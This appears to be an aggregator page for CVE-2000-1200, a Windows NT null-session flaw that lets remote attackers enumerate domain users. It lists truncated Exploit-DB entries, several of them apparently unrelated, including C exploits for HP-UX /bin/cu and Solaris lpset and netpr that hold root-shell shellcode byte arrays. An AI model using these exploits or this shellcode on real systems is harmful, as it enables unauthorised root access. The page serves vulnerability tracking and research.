CVE-2000-1200
Published: 2001-08-31
Priority: P4, 25
CVSS 2.0: 5 (medium), AV:N/AC:L/Au:N/C:P/I:N/A:N
EPSS: 48.10% (98.7th percentile)
Windows NT allows remote attackers to list all users in a domain by obtaining the domain SID with the LsaQueryInformationPolicy policy function via a null session and using the SID to list the users.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_nt | — | — |
No detection rules found.
Exploit-DB
Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities
exploitdb·2017-03-22
---
SEC Consult Vulnerability Lab Security Advisory
title: Multiple vulnerabilities
product: Solare Datensysteme GmbH
Solar-Log 250/300/500/800e/1000/1000 PM+/1200/2000
vulnerable version: Firmware 2.8.4-56 / 3.5.2-85
fixed version: Firmware 3.5.3-86
CVE number: -
impact: Critical
homepage: http://www.solar-log.com/de/home.html
found: 2017-01-23
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
Vendor description:
"Solare Datensysteme GmbH (SDS) is headquartered in the southern German city
of Binsdorf and specialises in
Exploit-DB
HP-UX 11.0 - '/bin/cu' Local Privilege Escalation
exploitdb·2001-01-13
CVE-2000-1028 HP-UX 11.0 - '/bin/cu' Local Privilege Escalation
---
/*
* Copyright (c) 2001 Zorgon
* All Rights Reserved
* The copyright notice above does not evidence any
* actual or intended publication of such source code.
*
* HP-UX /bin/cu exploit.
* Tested on HP-UX 11.00
* [email protected] (http://www.nightbird.free.fr)
*
*/
#include
#include
#include
#include
#define LEN 9778
#define HPPA_NOP 0x0b390280
#define RET 0x7f7eb010
#define OFFSET 1200 /* it works for me */
u_char hppa_shellcode[] = /* K2 shellcode */
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";
int
main(int argc , char **argv){
char buffer[LEN+8
Exploit-DB
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (2)
exploitdb·2000-04-24
CVE-2000-0317 Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/1138/info
A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use is unknown. However, when supplied a well-crafted buffer containing executable code, it is possible to execute arbitrary commands as root.
#include
#include
#define BSIZE 18001
#define OFFSET 20112
#define START 700
#define END 1200
#define NOP 0xac15a16e
#define EXSTART 116
char sparc_shellcode[] =
/* setreuid(0,0) */
"\x82\x10\x20\x17\x90\x20\x60\x17\x92\x22\x40\x09\x91\xd0\x20\x08"
/* other stuff */
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80
Exploit-DB
Solaris 2.6/7.0/8 - 'netpr' Local Buffer Overflow (1)
exploitdb·1999-05-23
CVE-2000-0407 Solaris 2.6/7.0/8 - 'netpr' Local Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/1200/info
A buffer overrun exists in the 'netpr' program, part of the SUNWpcu (LP) package included with Solaris, from Sun Microsystems. Versions of netpr on Solaris 2.6 and 7, on both Sparc and x86 have been confirmed as being vulnerable. The overflow is present in the -p option, normally used to specify a printer. By specifying a long buffer containing machine executable code, it is possible to execute arbitrary commands as root. On Sparc, the exploits provided will spawn a root shell, whereas on x86 it will create a setuid root shell in /tmp.
/**
*** netprex - SPARC Solaris root exploit for /usr/lib/lp/bin/netpr
***
*** Tested and confirmed under Solaris 2.6 and 7 (SPARC)
***
*** U
Exploit-DB
Solaris 2.6/7.0/8 - 'netpr' Local Buffer Overflow (2)
exploitdb·1999-03-04
CVE-2000-0407 Solaris 2.6/7.0/8 - 'netpr' Local Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/1200/info
A buffer overrun exists in the 'netpr' program, part of the SUNWpcu (LP) package included with Solaris, from Sun Microsystems. Versions of netpr on Solaris 2.6 and 7, on both Sparc and x86 have been confirmed as being vulnerable. The overflow is present in the -p option, normally used to specify a printer. By specifying a long buffer containing machine executable code, it is possible to execute arbitrary commands as root. On Sparc, the exploits provided will spawn a root shell, whereas on x86 it will create a setuid root shell in /tmp.
/**
*** netprex - i386 Solaris root exploit for /usr/lib/lp/bin/netpr
***
*** Tested and confirmed under Solaris 2.6 and 7 (i386)
***
*** Usa
No writeups or analysis indexed.